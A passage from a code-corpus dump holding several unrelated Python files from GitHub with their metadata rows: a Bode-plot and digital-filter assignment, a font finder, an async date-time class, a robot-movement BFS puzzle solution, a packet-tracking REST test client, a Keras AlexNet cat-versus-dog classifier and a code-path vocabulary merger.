plt.ylabel('|H(jw)| (dB)')
#plot2:
plt.subplot(2, 1, 2)
plt.semilogx(bodeW, bodePhase)
plt.grid() #add a grid to graph
plt.ylabel('angle of H(jw) (degs)')
plt.xlabel('w (rads/s)')
plt.show() #display figure
#TASK 1.3
sys3 = con.TransferFunction(num, denom)
plt.figure(figsize = (15,15))
#used _ = .... to suppress the output (function auto-plots)
_ = con.bode(sys3, w, dB = True, Hz = True, deg = True, plot = True)
plt.title('Bode plot for Task 1.3')
"""#(conMag, conPhase, conW) = con.bode(sys3, w, dB = True, Hz = True, deg = True, plot = True)
#plot1:
plt.rc('font', **font)
plt.figure(figsize = (30,30))
plt.subplot(2, 1, 1)
plt.semilogx(conW, conMag)
plt.grid() #add a grid to graph
plt.title('Bode plot for Task 1.3')
plt.ylabel('|H(jw)| (dB)')
#plot2:
plt.subplot(2, 1, 2)
plt.semilogx(conW, conPhase)
plt.grid() #add a grid to graph
plt.ylabel('angle of H(jw) (degs)')
plt.xlabel('w (Hz)')
plt.show() #display figure
"""
#TASK 2.1
#chosen as x(t)'s max w_0
fs = 2*np.pi*50000
steps = 1/fs
t = np.arange(0, 1e-2 + steps , steps)
x = np.cos(2*np.pi*100*t) + np.cos(2*np.pi*3024*t) + np.sin(2*np.pi*50000*t)
#plot:
plt.figure(figsize = (15,15))
plt.plot(t, x)
plt.grid() #add a grid to graph
plt.title('x(t) vs t')
plt.ylabel('x(t)')
plt.xlabel('t (s)')
plt.show() #display figure
#TASK 2.2: conv H(s) to z-dom
(zNum, zDenom) = sig.bilinear(num, denom, 500000)
#TASK 2.3: pass x(t) thru z-dom filter
y = sig.lfilter(zNum, zDenom, x)
#plot:
plt.figure(figsize = (15,15))
plt.plot(t, y)
plt.grid() #add a grid to graph
plt.title('y(t) vs t')
plt.ylabel('y(t)')
plt.xlabel('t (s)')
plt.show() #display figure
| SethCram/Signals-and-Systems-Code | proj10_main.py | proj10_main.py | py | 3,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "numpy.arctan",
"line_number... |
2705037908 | import os
from PIL import ImageFont
def FindFonts():
    """Scan the Windows fonts directory for regular-weight TrueType fonts.

    Returns a dict mapping font family name -> filename for every .ttf
    file whose style reads "Regular".
    """
    fontdir = 'C:\\Windows\\Fonts'
    files = os.listdir(fontdir)
    fonts = dict()
    for f in files:
        # endswith() handles extensionless and multi-dot filenames, which
        # made the old `f.split('.')[1]` check raise IndexError / misfire,
        # and it matches case-insensitively (e.g. "ARIAL.TTF").
        if f.lower().endswith('.ttf'):
            tmp = ImageFont.truetype(os.path.join(fontdir, f), 1)
            if tmp.font.style == "Regular":
                fonts[tmp.font.family] = f
    return fonts
{
"api_name": "os.listdir",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "PIL.ImageFont.truetype",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "PIL.ImageFont",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"li... |
23268546540 | import pytz
from datetime import datetime
from datetime import timedelta
import asyncio
class DateError(Exception):
    """Raised when a date string cannot be parsed as 'YYYY-MM-DD'."""
    pass
class TimeError(Exception):
    """Raised when a time string cannot be parsed as 'HH:MM:SS'."""
    pass
class DateTimeError(TimeError, DateError):
    """Raised when a combined 'date time' string or field name is invalid."""
    pass
class DateTime:
    """A mutable, asyncio-friendly calendar date plus wall-clock time.

    Field values live in the private ``__dt`` dict, keyed by the names in
    ``__dn`` (year, month, day, hour, minute, second).  Every operation is
    a coroutine so callers inside an event loop never block.
    """
    @classmethod
    async def at(cls, date, time):
        """Construct from a 'YYYY-MM-DD' date and an 'HH:MM:SS' time."""
        self = DateTime()
        await (self.init())
        await (self.setDate(date))
        await (self.setTime(time))
        return self
    @classmethod
    async def utc(cls, hours = 0):
        """Construct from the current UTC time, shifted by `hours`."""
        self = DateTime()
        await (self.init())
        t = str(datetime.utcnow().replace(tzinfo=pytz.utc))
        t = t[0:t.find('.')]  # strip fractional seconds (and the tz suffix after them)
        await (self.setAll(t))
        await (self.offset(hours = hours))
        return self
    @classmethod
    async def fromString(cls, s):
        """Construct from a 'YYYY-MM-DD HH:MM:SS' string."""
        self = DateTime()
        await (self.init())
        await (self.setAll(s))
        return self
    async def init(self):
        """Reset all six fields to None."""
        self.__dn = [
            "year",
            "month",
            "day",
            "hour",
            "minute",
            "second"
        ]
        self.__dt = {}
        for n in self.__dn:
            self.__dt[n] = None
    async def _max(self, n):
        """Largest legal value of field `n`; the day maximum depends on the
        currently stored month and year."""
        i = self.__dn.index(n)
        switcher = {
            0: 9999,
            1: 12,
            2: -1,  # sentinel: resolved below from the current month/year
            3: 23,
            4: 59,
            5: 59
        }
        rm = switcher.get(i)
        if (rm < 0):
            dic = {
                31: [1, 3, 5, 7, 8, 10, 12],
                30: [4, 6, 9, 11],
                28: [2],
                29: []
            }
            # Gregorian leap-year rule.  (Bug fix: this previously read the
            # undefined name `disc` -- a NameError for any year % 4 == 0 --
            # and also treated every fourth year, e.g. 1900, as a leap year.)
            year = self.__dt["year"]
            if (year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)):
                dic[29].append(dic[28].pop(0))
            for days, months in dic.items():
                for m in months:
                    if (m == self.__dt["month"]):
                        rm = days
        return rm
    async def _min(self, n):
        """Smallest legal value of field `n` (1 for month/day, else 0)."""
        i = self.__dn.index(n)
        switcher = {
            0: 0,
            1: 1,
            2: 1,
            3: 0,
            4: 0,
            5: 0
        }
        return switcher.get(i)
    async def offset(self, **args):
        """Shift fields by keyword amounts (years=, months=, ..., seconds=),
        carrying overflow into the next-coarser field."""
        for t, v in args.items():
            t = t[:-1]  # 'seconds' -> 'second', etc.
            if t in self.__dn:
                adder = int(v)
                self.__dt[t] = int(self.__dt[t]) + adder
                mi = (await self._min(t))
                while True:
                    ma = (await self._max(t))
                    if (self.__dt[t] <= ma):
                        break
                    # Wrap this field and carry one unit into the coarser one.
                    self.__dt[t] = (mi + (self.__dt[t] - ma)) - 1
                    dic = {}
                    dic[str(self.__dn[self.__dn.index(t) - 1]) + 's'] = 1
                    await (self.offset(**dic))
            else:
                raise DateTimeError("Invalid string for offset (" + str(t) + ")")
    async def get(self, n):
        """Return the raw integer value of field `n`."""
        return self.__dt[n]
    async def set(self, **args):
        """Set fields by keyword (year=, month=, ...); values are int()-coerced."""
        for t, v in args.items():
            if t in self.__dn:
                self.__dt[t] = int(v)
            else:
                raise DateTimeError("Invalid string for set")
    async def setAll(self, dt):
        """Parse and store a 'YYYY-MM-DD HH:MM:SS' string."""
        dt = str(dt).split(' ')
        if (len(dt) == 2):
            await (self.setDate(dt[0]))
            await (self.setTime(dt[1]))
        else:
            raise DateTimeError("Invalid DateTime format!")
    async def setDate(self, date):
        """Parse and store a 'YYYY-MM-DD' date string."""
        date = str(date).replace(' ', '')
        dp = date.split('-')
        if (len(dp) == 3):
            await (self.set(
                year = int(dp[0]),
                month = int(dp[1]),
                day = int(dp[2])
            ))
        else:
            raise DateError("Invalid date passed!")
    async def setTime(self, time):
        """Parse and store an 'HH:MM:SS' time string (extra digits ignored)."""
        time = str(time).replace(' ', '')
        tp = time.split(':')
        if (len(tp) == 3):
            tp[0] = tp[0][0:2]
            tp[1] = tp[1][0:2]
            tp[2] = tp[2][0:2]
            await (self.set(
                hour = int(tp[0]),
                minute = int(tp[1]),
                second = int(tp[2])
            ))
        else:
            raise TimeError("Invalid time passed! " + str(tp))
    async def _asString(self, data, l = 2):
        """Zero-pad field `data` to width `l`."""
        data = str(self.__dt[str(data)])
        while (len(data) < l):
            data = '0' + data
        return data
    async def dateAsString(self):
        """Return the date part formatted as 'YYYY-MM-DD'."""
        yyyy = (await self._asString("year", 4))
        mm = (await self._asString("month"))
        dd = (await self._asString("day"))
        return (yyyy + '-' + mm + '-' + dd)
    async def timeAsString(self):
        """Return the time part formatted as 'HH:MM:SS'."""
        hh = (await self._asString("hour"))
        mm = (await self._asString("minute"))
        ss = (await self._asString("second"))
        return (hh + ':' + mm + ':' + ss)
    async def asString(self):
        """Return the full 'YYYY-MM-DD HH:MM:SS' representation."""
        return ((await self.dateAsString()) + ' ' + (await self.timeAsString()))
    async def _compare(self, other):
        """Field-by-field compare: -1 if equal, 0 if self is later, 1 if earlier."""
        for i in range(0, len(self.__dn)):
            c = self.__dn[i]
            si = self.__dt[c]
            oi = (await other.get(c))
            if (si == oi):
                continue
            elif (si > oi):
                return 0
            else:
                return 1
        return -1
    async def asRecentAs(self, other):
        """True when the two timestamps are exactly equal."""
        return ((await self._compare(other)) == -1)
    async def lessRecentThan(self, other):
        """True when self is strictly earlier than `other`."""
        return ((await self._compare(other)) == 1)
    async def moreRecentThan(self, other):
        """True when self is strictly later than `other`."""
        return ((await self._compare(other)) == 0)
| Liyara/Tracker | date_time_handler.py | date_time_handler.py | py | 4,172 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.utcnow",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "pytz.utc",
"line_number": 29,
"usage_type": "attribute"
}
] |
31298546243 | from collections import deque
def solution(board):
    """Minimum number of moves for a 1x2 robot starting at (0,0)-(0,1)
    to bring either of its cells onto (n-1, n-1).

    BFS over states (pivot_row, pivot_col, heading, elapsed); heading
    0..3 means the partner cell lies east/south/west/north of the pivot.
    Each move is a one-cell slide or a 90-degree rotation about either
    occupied cell.
    """
    n = len(board)
    DR = (0, 1, 0, -1)   # row deltas for headings E, S, W, N
    DC = (1, 0, -1, 0)   # col deltas
    seen = [[[False] * 4 for _ in range(n)] for _ in range(n)]

    def inside(r, c):
        return 0 <= r < n and 0 <= c < n

    def can_occupy(r, c, d):
        # Both cells of the robot must be on the board and empty.
        r2, c2 = r + DR[d], c + DC[d]
        return inside(r2, c2) and board[r][c] == 0 and board[r2][c2] == 0

    def can_rotate(r, c, d, nd):
        # Rotating about (r, c) from heading d to nd: the new partner cell
        # and the swept corner cell must both be empty.
        r2, c2 = r + DR[d], c + DC[d]
        nr, nc = r + DR[nd], c + DC[nd]
        if not (inside(r2, c2) and inside(nr, nc)):
            return False
        if board[nr][nc] == 1:
            return False
        if d in (0, 2):                 # robot currently lies east-west
            return board[nr][c2] == 0
        return board[r2][nc] == 0       # robot currently lies north-south

    seen[0][0][0] = True
    seen[DR[0]][DC[0]][2] = True        # same robot, described from its other cell
    frontier = deque([(0, 0, 0, 0)])
    while frontier:
        r, c, d, t = frontier.popleft()
        if (r, c) == (n - 1, n - 1) or (r + DR[d], c + DC[d]) == (n - 1, n - 1):
            return t
        # Rotations about the pivot cell (r, c).
        for turn in (-1, 1):
            nd = (d + turn) % 4
            if (inside(r + DR[nd], c + DC[nd])
                    and not seen[r][c][nd]
                    and can_rotate(r, c, d, nd)):
                seen[r][c][nd] = True
                frontier.append((r, c, nd, t + 1))
        # Rotations about the partner cell.
        pr, pc, pd = r + DR[d], c + DC[d], (d + 2) % 4
        for turn in (-1, 1):
            nd = (pd + turn) % 4
            if (inside(pr + DR[nd], pc + DC[nd])
                    and not seen[pr][pc][nd]
                    and can_rotate(pr, pc, pd, nd)):
                seen[pr][pc][nd] = True
                frontier.append((pr, pc, nd, t + 1))
        # One-cell slides in all four compass directions.
        for md in range(4):
            nr, nc = r + DR[md], c + DC[md]
            if (inside(nr, nc) and not seen[nr][nc][d]
                    and can_occupy(nr, nc, d)):
                seen[nr][nc][d] = True
                frontier.append((nr, nc, d, t + 1))
# Sample board from the problem statement; expected output: 7.
print(solution([[0, 0, 0, 1, 1],
                [0, 0, 0, 1, 0],
                [0, 1, 0, 1, 1],
                [1, 1, 0, 0, 1],
                [0, 0, 0, 0, 0]]))
| shwjdgh34/algorithms-python | codingTest/2020kakao/블록이동하기.py | 블록이동하기.py | py | 2,786 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 47,
"usage_type": "call"
}
] |
import json
import urllib.error
import urllib.request
url = 'http://ec2-35-158-239-16.eu-central-1.compute.amazonaws.com'
post_port = 8000
tracking_port = 8001
headers = {"Content-Type":"application/json"}
packet = {'sender_name' : 'Otto Hahn',
'sender_street' : 'Veilchenweg 2324',
'sender_zip' : '12345',
'sender_city' : 'Hamburg',
'receiver_name' : 'Lise Meitner',
'receiver_street' : 'Amselstraße 7',
'receiver_zip' : '01234',
'receiver_city' : 'Berlin',
'size' : 'big',
'weight' : '200'}
def registerPacket():
    """POST the module-level `packet` to the register service.

    Returns the decoded JSON response (expected to carry 'packet_id').
    Exits the process with status 1 on network or JSON-decoding failure.
    """
    registerRequest = urllib.request.Request(
        url + ':' + str(post_port) + '/register',
        data=json.dumps(packet).encode('utf8'),
        headers={"Content-Type": "application/json"})
    try:
        response = urllib.request.urlopen(registerRequest)
        responseJson = json.loads(response.read().decode('utf8'))
        print('Register completed.')
        return responseJson
    # Bug fix: the bare `except:` also swallowed SystemExit/KeyboardInterrupt
    # and hid the real error, and exit(0) falsely reported success.
    except (urllib.error.URLError, ValueError) as e:
        print('Register went wrong: {}'.format(e))
        exit(1)
def trackPacket(packet_id):
    """GET the tracking status for `packet_id` from the tracking service.

    Returns the decoded JSON status payload.  Exits the process with
    status 1 on network or JSON-decoding failure.
    """
    trackingRequest = urllib.request.Request(
        url + ':' + str(tracking_port) + '/packetStatus/' + packet_id,
        headers={"Content-Type": "application/json"})
    try:
        response = urllib.request.urlopen(trackingRequest)
        responseJson = json.loads(response.read().decode('utf8'))
        print('Tracking completed.')
        return responseJson
    # Bug fix: narrowed from `except Exception` (which discarded `e`) and
    # exit(0), which falsely reported success to the shell.
    except (urllib.error.URLError, ValueError) as e:
        print('Tracking went wrong: {}'.format(e))
        exit(1)
if __name__ == '__main__':
    # Smoke test: register one packet, then immediately poll its status.
    packet_id = registerPacket()['packet_id']
    trackPacket(packet_id)
| CodingCamp2017/pakete | services/tests/test_rest_tracking_service.py | test_rest_tracking_service.py | py | 1,711 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.request.request.Request",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 21,
"usage_type": "name"
},
{
"api_nam... |
28912430156 | #The code looks to distinguish between cats and dogs using the AlexNet model set up
#This model does not work at high percentage of correctness over 20 epochs due to underfitting as AlexNet is set up to work over larger datasets
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn import model_selection
from sklearn.metrics import accuracy_score
from collections import Counter
import keras
from keras.models import Sequential
from keras.layers import Dense, Conv2D
from keras.layers import Activation, MaxPooling2D, Dropout, Flatten, Reshape
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def categorical_to_numpy(labels_in):
    """One-hot encode string labels: 'dog' -> [1, 0], anything else -> [0, 1]."""
    one_hot = {True: np.array([1, 0]), False: np.array([0, 1])}
    encoded = [one_hot[label == 'dog'] for label in labels_in]
    return np.array(encoded)
def load_data():
    """Download the pickled CIFAR subset (dogs vs. road) and return (data, labels).

    Fetches a pickled dict with keys 'data' and 'labels' via gdown into a
    local file named 'cifar_data'.
    """
    # Run this cell to download our data into a file called 'cifar_data'
    import gdown
    gdown.download('https://drive.google.com/uc?id=1-BjeqccJdLiBA6PnNinmXSQ6w5BluLem','cifar_data','True'); # dogs v road;
    # now load the data from our cloud computer
    import pickle
    # Bug fix: the previous bare open() leaked the file handle; a context
    # manager closes it deterministically.
    with open("cifar_data", "rb") as fh:
        data_dict = pickle.load(fh)
    data = data_dict['data']
    labels = data_dict['labels']
    return data, labels
def plot_one_image(data, labels, img_idx):
    """Show the `img_idx`-th flattened row of `data` as a 32x32 RGB image,
    printing its label first."""
    from google.colab.patches import cv2_imshow
    import cv2
    import matplotlib.pyplot as plt
    image = data[img_idx, :].squeeze().reshape([32, 32, 3]).copy()
    label = labels[img_idx]
    print('label: %s' % label)
    plt.imshow(image)
    plt.show()
def CNNClassifier(num_epochs=2, layers=1, dropout=0.15):
def create_model():
model = Sequential()
model.add(Reshape((32, 32, 3)))
for i in range(layers):
model.add(Conv2D(32, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(dropout))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(dropout))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(dropout))
model.add(Dense(2))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
return model
return KerasClassifier(build_fn=create_model, epochs=num_epochs, batch_size=10, verbose=2)
def plot_acc(history, ax = None, xlabel = 'Epoch #'):
    """Plot training vs. validation accuracy per epoch from a Keras History.

    Marks chance level (0.5) and the epoch with the best validation
    accuracy; draws on `ax` (a new figure is created when ax is falsy).
    """
    # Note: this intentionally mutates history.history by adding 'epoch',
    # matching the original behaviour.
    metrics = history.history
    metrics.update({'epoch': list(range(len(metrics['val_accuracy'])))})
    frame = pd.DataFrame.from_dict(metrics)
    ranked = frame.sort_values(by='val_accuracy', ascending=False)
    best_epoch = ranked.iloc[0]['epoch']
    if not ax:
        _, ax = plt.subplots(1, 1)
    for metric, label in (('val_accuracy', 'Validation'), ('accuracy', 'Training')):
        sns.lineplot(x='epoch', y=metric, data=frame, label=label, ax=ax)
    ax.axhline(0.5, linestyle='--', color='red', label='Chance')
    ax.axvline(x=best_epoch, linestyle='--', color='green', label='Best Epoch')
    ax.legend(loc=1)
    ax.set_ylim([0.4, 1])
    ax.set_xlabel(xlabel)
    ax.set_ylabel('Accuracy (Fraction)')
    plt.show()
def model_to_string(model):
    """Return model.summary() as a single string with Keras layer-name
    numeric suffixes (e.g. 'dense_12') stripped for stable output."""
    import re
    lines = []
    model.summary(print_fn=lines.append)
    summary = "\n".join(lines)
    # Strip 3-digit, then 2-digit, then 1-digit suffixes, exactly as before.
    for pattern in ('_\d\d\d', '_\d\d', '_\d'):
        summary = re.sub(pattern, '', summary)
    return summary
import tensorflow as tf
import os
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from google.colab.patches import cv2_imshow
import cv2
import matplotlib.pyplot as plt
try:
road_model = model
road_saved = True
except NameError:
road_saved = False
IMG_SHAPE = 150 # Our training data consists of images with width of 150 pixels and height of 150 pixels
_URL = 'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip'
zip_dir = tf.keras.utils.get_file('cats_and_dogs_filterted.zip', origin=_URL, extract=True)
base_dir = os.path.join(os.path.dirname(zip_dir), 'cats_and_dogs_filtered')
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats') # directory with our training cat pictures
train_dogs_dir = os.path.join(train_dir, 'dogs') # directory with our training dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats') # directory with our validation cat pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs') # directory with our validation dog pictures
train_image_generator = ImageDataGenerator() # Generator for our training data
validation_image_generator = ImageDataGenerator() # Generator for our validation data
train_data = train_image_generator.flow_from_directory(batch_size=2000,
directory=train_dir,
shuffle=True,
target_size=(IMG_SHAPE,IMG_SHAPE), #(150,150)
class_mode='binary').next()
val_data = validation_image_generator.flow_from_directory(batch_size=1000,
directory=validation_dir,
shuffle=False,
target_size=(IMG_SHAPE,IMG_SHAPE), #(150,150)
class_mode='binary').next()
cd_train_inputs, cd_train_labels = train_data
cd_test_inputs, cd_test_labels = val_data
model = Sequential()
#TODO: Your AlexNet code here:
model.add(Conv2D(96, 11, strides = 3))
model.add(Activation('relu'))
model.add(Conv2D(256, 5))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Conv2D(384, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Conv2D(384, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(Conv2D(256, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(4096))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# Train the CNN and plot accuracy.
# Substituted new dataset names; to_categorical converts to one-hot, as ValueError suggests
history = model.fit(cd_train_inputs, to_categorical(cd_train_labels), \
validation_data=(cd_test_inputs, to_categorical(cd_test_labels)), \
epochs=70)
plot_acc(history)
print (model.summary())
| arulverma/Inspirit-AI-programs | Cat vs Dog AlexNet.py | Cat vs Dog AlexNet.py | py | 7,976 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "gdown.download",
"line_number... |
34153413716 | import datetime
def add_records(obj, db):
    """Insert the race entries of one parsed JSON event into `db`.

    @param obj: dict with 'Name' (event name), 'Date' ({'Year','Month','Day'})
                and one numeric key per finishing position, each mapping to
                that entry's field dict.
    @param db:  open sqlite3 connection; rows go into the `entry` table
                created by create_table().  Duplicate hashes are ignored
                (INSERT OR IGNORE).
    """
    # Collect the per-position entries; 'Name' and 'Date' are event metadata.
    entries = {int(key): value for key, value in obj.items()
               if str(key) not in ('Name', 'Date')}

    # Parse the event metadata once instead of once per entry.
    event_name = str(obj['Name'])
    event_date = datetime.date(int(obj['Date']['Year']),
                               int(obj['Date']['Month']),
                               int(obj['Date']['Day']))
    for position, entry in entries.items():
        entry['Event'] = event_name
        entry['Date'] = event_date
        entry['Position'] = position

    cursor = db.cursor()
    # executemany issues all inserts in one call; the 14 values match the
    # column order declared in create_table().
    cursor.executemany(
        "INSERT OR IGNORE INTO entry VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
        [(e['Hash'], e['Position'], e['Team Name'],
          e['Number'], e['Class'], e['Year'],
          e['Make'], e['Model'], e['Laps'],
          e['Best Time'], e['BS Penalty Laps'],
          e['Black Flag Laps'], e['Event'], e['Date'])
         for e in entries.values()])
    db.commit()
def create_table(db):
    """Create the `entry` results table in `db` if it does not already exist.

    One row per unique entry hash; the column order matches the value
    tuple built by add_records().
    """
    cursor = db.cursor()
    command = """
        CREATE TABLE IF NOT EXISTS entry (
            hash BLOB PRIMARY KEY,
            position int,
            team_name text,
            vic_no int,
            class CHAR(1),
            year int,
            make text,
            model text,
            laps int,
            best_time text,
            bs_laps int,
            flag_laps int,
            event_name text,
            event_date text,
            UNIQUE (hash));
        """
    cursor.execute(command)
    db.commit()
| segfaultmagnet/sweet-db | util/sqlloader.py | sqlloader.py | py | 1,535 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date",
"line_number": 16,
"usage_type": "call"
}
] |
34016955487 | import torch
import torch.nn as nn
import transformers
class BertForSeqClf(nn.Module):
    """BERT encoder topped with dropout and a linear head mapping the
    pooled sentence representation to `num_labels` classification logits."""
    def __init__(self, pretrained_model_name: str, num_labels: int):
        """Load pretrained BERT weights and build the classification head."""
        super().__init__()
        config = transformers.BertConfig.from_pretrained(pretrained_model_name,
                                                         num_labels=num_labels)
        self.num_labels = num_labels
        self.bert = transformers.BertModel.from_pretrained(pretrained_model_name)
        self.classifier = nn.Linear(config.hidden_size,
                                    num_labels)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
    def forward(self, input_ids: torch.LongTensor,
                attention_mask: torch.LongTensor,
                token_type_ids: torch.LongTensor):
        """Return classification logits of shape (batch, num_labels)."""
        outputs = self.bert(input_ids,
                            attention_mask=attention_mask,
                            token_type_ids=token_type_ids)
        # Element 1 of BertModel's output tuple is the pooled [CLS]
        # representation (per the transformers API).
        pooled_output = outputs[1]
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)
        return logits
| ayeffkay/Distillation | bert.py | bert.py | py | 1,092 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "transformers.BertConfig.from_pretrained",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tr... |
10322811313 | import os
import tqdm
import argparse
import pandas as pd
max_row = 0
def trans(value, mapping, unknown=0):
    """Map an id through `mapping`, falling back to `unknown`.

    value:   id (int or numeric string) to translate.
    mapping: dict of old id -> new id; values may be NaN (treated as missing).
    unknown: substitute used when the id is absent or maps to NaN.
    Returns the translated id as the string form of an int.

    Note: the second parameter was previously named `dict`, shadowing the
    builtin; all call sites in this file pass it positionally.
    """
    new_value = mapping.get(int(value), unknown)
    if pd.isna(new_value):
        new_value = unknown
    return str(int(new_value))
def transform_paths(row, map_dict):
    """Rewrite the space-separated node ids in row['path'] via map_dict.

    Intended for DataFrame.apply(axis=1); mutates and returns `row`.
    """
    paths_ids = row['path'].split()
    new_ids = []
    for id in paths_ids:
        new_id = trans(id, map_dict)
        new_ids.append(new_id)
    new_path_id = ' '.join(new_ids)
    row['path'] = new_path_id
    return row
def transform_paths_content(row, token_map, path_map):
    """Translate one 'start_token,path,end_token' context triple into the
    merged id space and return it in the same comma-separated format."""
    row = row.split(',')
    start_token_id = row[0]
    path_id = row[1]
    end_token_id = row[2]
    new_start_token_id = trans(start_token_id, token_map)
    new_path_id = trans(path_id, path_map)
    new_end_token_id = trans(end_token_id, token_map)
    return '{},{},{}'.format(new_start_token_id, new_path_id,
                             new_end_token_id)
def fill_nan(vocab_map):
    """Assign fresh sequential ids to merged-vocab rows missing 'id_y'.

    After an outer merge, entries present in only one vocab have NaN in
    'id_y'; each gets max(existing id) + 1, + 2, ... in row order.
    Returns the updated DataFrame.

    Note: this previously leaked state through the module-level `max_row`
    global; a closure-local counter is used instead.
    """
    next_id = vocab_map['id_y'].max()

    def apply_new_id(row):
        nonlocal next_id
        if pd.isna(row['id_y']):
            row['id_y'] = int(next_id + 1)
            next_id = row['id_y']
        return row

    return vocab_map.apply(apply_new_id, axis=1)
def vocab_merge(vocab_a, vocab_b, on, method):
    """Merge two vocab frames on column(s) `on` with pandas `how=method`.

    For an 'outer' merge, rows that exist in only one frame get fresh ids
    assigned via fill_nan().
    """
    vocab = vocab_a.merge(vocab_b, on=on, how=method)
    if method == 'outer':
        vocab = fill_nan(vocab)
    return vocab
def save_vocab(vocab, path, columns=None):
    """Write a merged vocab frame to CSV, keeping only the mapped columns.

    Drops the first (old-id) column, renames the remainder to `columns`
    (expected ['name', 'id']), reorders id-first and casts id to int32.
    NOTE(review): if the reorder/cast fails the frame is printed and then
    saved un-reordered -- presumably a debugging aid; confirm intent.
    """
    vocab = vocab.iloc[:, 1:]
    if columns is not None:
        vocab.columns = columns
    try:
        # columns[1] is 'id'; columns[0] the textual value (token/path/...).
        vocab = vocab[[columns[1], columns[0]]].astype({'id': 'int32'})
    except ValueError:
        print(vocab)
    vocab.to_csv(path, index=False)
def map2dict(vocab_map):
    """Build {old_id: new_id} from a merged vocab frame.

    Column 0 holds the old id (NaN when the entry exists on one side only;
    such rows are skipped) and column 2 the id in the merged space.
    """
    return {
        int(old_id): new_id
        for old_id, new_id in zip(vocab_map.iloc[:, 0], vocab_map.iloc[:, 2])
        if not pd.isna(old_id)
    }
def parse_args():
    """Build and parse the command-line arguments for vocab generation."""
    parser = argparse.ArgumentParser("CodePath Vocab Generation!!")
    # root directory holding the extracted path data
    parser.add_argument('--data_path', type=str, default='/.../APathCS/github/path_data/',help="data location")
    # dataset name
    parser.add_argument('--data_name', type=str, default='example', help="dataset name")
    # programming language of the corpus
    parser.add_argument('--lang_type', type=str, default='java', help="different code type")
    # training split sub-directory
    parser.add_argument('--train_path', type=str, default='train_i', help="train path dataset")
    # test split sub-directory
    parser.add_argument('--test_path', type=str, default='test', help="test path dataset")
    # output directory
    parser.add_argument('--out_path', type=str, default=' ', help="path output")
    # NOTE(review): argparse `type=bool` treats any non-empty string
    # (including "False") as True -- consider a store_true flag instead.
    parser.add_argument("--merge_vocab", type=bool, default=False, help="need merge vocab")
    return parser.parse_args()
def main():
# 配置
args = parse_args()
# /.../APathCS/github/path_data/XXX/java
lang_path = os.path.join(args.data_path, args.data_name, args.lang_type)
# 训练数据的路径
train_path = os.path.join(lang_path, args.train_path)
# 测试数据的路径
test_path = os.path.join(lang_path, args.test_path)
# 输出文件的目录
out_path = os.path.join(lang_path, args.out_path)
if not os.path.exists(out_path):
# 创建 code_path/train
os.makedirs(out_path)
# 训练集
token_vocab_train = pd.read_csv(os.path.join(train_path, 'tokens.csv'))
node_vocab_train = pd.read_csv(os.path.join(train_path, 'node_types.csv'))
